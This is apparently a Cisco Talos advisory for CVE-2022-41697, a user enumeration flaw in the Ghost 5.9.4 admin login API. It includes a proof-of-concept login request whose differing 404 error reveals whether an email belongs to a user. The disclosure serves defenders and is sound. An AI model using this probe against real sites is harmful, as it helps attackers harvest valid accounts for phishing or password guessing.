CVE-2022-41697: TALOS-2022-1625 || Cisco Talos Intelligence Group

SUMMARY

A user enumeration vulnerability exists in the login functionality of Ghost Foundation Ghost 5.9.4. A specially-crafted HTTP request can lead to a disclosure of sensitive information. An attacker can send a series of HTTP requests to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

PRODUCT URLS

Ghost - http://www.ghost.org

CVSSv3 SCORE

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CWE

CWE-204 - Response Discrepancy Information Exposure

DETAILS

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

A commonly overlooked vulnerabilty in web applications allows attackers to enumerate user accounts for an application. This type of vulnerabilty has minimal impact in general, as the attacker would still be required to guess a valid password. To mitigate bruteforce password attempts, Ghost leverages a third party library for maintaining access attempts and implements longer and longer timeout periods before allowing further requests from a host. Any system that uses email addresses for usernames allows attackers to still leverage the ability to enumerate valid users without directly targetting the authentication of the system. For example, it is trivial to harvest valid email addresses for an organization through other external means. If an organization is small enough, or the attacker is further able to narrow down potential users of the system, the attacker can use this type of attack to validate which users to attack using phishing attacks, exploit kits, etc.

OWASP - WSTG-IDNT-04

Exploit Proof of Concept

Request:

POST /ghost/api/admin/session HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-Ghost-Version: 5.12
App-Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://localhost:3001
DNT: 1
Connection: close
Referer: http://localhost:3001/ghost/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"username":"[email protected]","password":"asdfasdfasdf"}

Response:

HTTP/1.1 404 Not Found
X-Powered-By: Express
Cache-Control: no-cache, private, no-store, must-revalidate, max-stale=0, post-check=0, pre-check=0
Access-Control-Allow-Origin: http://localhost:3001
Vary: Origin, Accept-Encoding
Content-Type: application/json; charset=utf-8
Content-Length: 227
ETag: W/"e3-u3gQCrLnLzZLBfGsRRRY7NHIbRI"
Date: Fri, 23 Sep 2022 20:39:45 GMT
Connection: close

{"errors":[{"message":"There is no user with that email address.","context":null,"type":"NotFoundError","details":null,"property":null,"help":null,"code":null,"id":"dbc5eba0-3b7f-11ed-927a-a985a499596d","ghostErrorCode":null}]}

TIMELINE

2022-10-26 - Vendor Disclosure
2022-10-26 - Initial Vendor Contact
2022-12-28 - Public Release

Dave McDaniel and other members of Cisco Talos.